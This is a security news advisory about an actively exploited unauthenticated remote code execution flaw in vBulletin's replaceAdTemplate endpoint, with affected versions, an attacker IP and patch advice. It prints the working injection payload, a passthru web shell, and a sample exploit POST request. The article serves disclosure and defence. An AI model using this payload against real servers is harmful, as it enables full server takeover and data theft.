.webp?w=696&resize=696,0&ssl=1 "vBulletin Vulnerability")
A newly disclosed and actively exploited unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin forum software threatens thousands of online communities worldwide.
The flaw, impacting vBulletin versions 5.0.0 through 6.0.3, allows attackers to execute arbitrary commands on vulnerable servers, posing a severe risk to data integrity and site control.
Technical Analysis: Unauthenticated RCE in vBulletin
The vulnerability, recently uncovered by the security research group Karma(In)Security, leverages insecure handling within the ajax/api/ad/replaceAdTemplate endpoint. Attackers can inject raw PHP code through this endpoint, enabling execution without authentication. The payload observed in live attacks is shockingly simple:
php<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>
When sent via a crafted HTTP POST request, this code injects a backdoor, giving the attacker remote shell access to the server by executing any command passed in the cmd POST parameter.
Sample malicious POST request:
textPOST /ajax/api/ad/replaceAdTemplate HTTP/1.1
Host: vulnerable-forum.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded
cmd=whoami
Live Exploitation Confirmed
On May 26, 2025, honeypot systems detected several exploitation attempts from a Polish IP address (195.3.221.137), confirming real-world attacks.
Evidence suggests attackers are using the proof-of-concept code released by researchers, rather than automated attack frameworks.
The vulnerability has drawn attention in the security community due to the existence of a Nuclei template and increasing scan activity observed in industry logs, such as those tracked by the SANS Internet Storm Center. Despite the patch being available for over a year (in versions 6.0.3 Patch Level 1, 6.0.2 Patch Level 1, 6.0.1 Patch Level 1, and 5.7.5 Patch Level 3), many forums remain dangerously exposed.
Urgent Mitigation
While the CVE assignments (CVE-2025-48827 and CVE-2025-48828) are pending public documentation, the implications are clear: Admins must update vBulletin immediately to at least version 6.0.3 PL1 or, ideally, the current 6.1.1 version. Delay in patching risks complete server compromise.
.webp?resize=1600,900&ssl=1&description=vBulletin Vulnerability - A newly disclosed and actively exploited unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin.){kind=link}